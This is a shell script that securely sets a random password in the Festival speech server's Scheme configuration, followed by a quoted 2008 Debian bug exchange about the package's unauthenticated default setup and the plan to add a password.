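# scheme_escape STRING -> STRING with \ and " escaped for a Scheme literal
scheme_escape() {
    printf '%s\n' "$1" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g'
}

# random_passwd -> 32 hex characters from /dev/urandom
random_passwd() {
    head -c 16 /dev/urandom | od -An -tx1 | tr -d ' \n'
}

# get_server_passwd_line FILE -> the (set! server_passwd ...) line, if any
get_server_passwd_line() {
    grep -E '^[[:blank:]]*\(set![[:blank:]]+server_passwd[[:blank:]]' "$1"
}

# set_server_passwd FILE PASSWORD
# Replaces any existing (set! server_passwd ...) line, or appends one,
# then swaps the new file in atomically with owner-only permissions.
set_server_passwd() {
    cfg="$1"
    esc=$(scheme_escape "$2")
    [ -r "$cfg" ] || { echo "set_server_passwd: cannot read $cfg" >&2; return 1; }
    tmp="$cfg.tmp.$$"
    ( umask 077                      # temp file is born 0600, never world-readable
      {
          grep -Ev '^[[:blank:]]*\(set![[:blank:]]+server_passwd[[:blank:]]' "$cfg"
          printf '(set! server_passwd "%s")\n' "$esc"
      } > "$tmp"
    ) || { rm -f "$tmp"; return 1; }
    chmod 0600 "$tmp"
    mv -f "$tmp" "$cfg"
}

# Constructed demonstration: a config with the shipped nil password gets a
# random one; the printed file and mode show the result.
demo=$(mktemp -d)
printf '(set! server_port 1314)\n(set! server_passwd nil)\n' > "$demo/festival.scm"
set_server_passwd "$demo/festival.scm" "$(random_passwd)"
cat "$demo/festival.scm"
ls -l "$demo/festival.scm"
rm -rf "$demo"
```

The escaping is the part worth testing: a password of `a"b\c` must land in the file as `(set! server_passwd "a\"b\\c")`, one line, with the rest of the configuration untouched.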
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sun, Feb 17, 2008 at 05:51:38AM +, Tim Brown wrote:
> > A package is ready for upload at mentors. Thanks for the report. If,
> > after consulting my sponsor and some security people, I find that it is
> > OK, it shall be uploaded.
> 
> Kumar,
> 
> Can I suggest that a password is set (perhaps take a look at the Debian
> MySQL server package which does something similar for the debian-sys-maint
> in the /etc/mysql/debian.cnf file). Limiting access to local hosts is an
> improvement, but as noted it does not guard against local privilege
> escalation attacks.

I shall make an attempt to arrange for this. Thank you for the suggestion.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036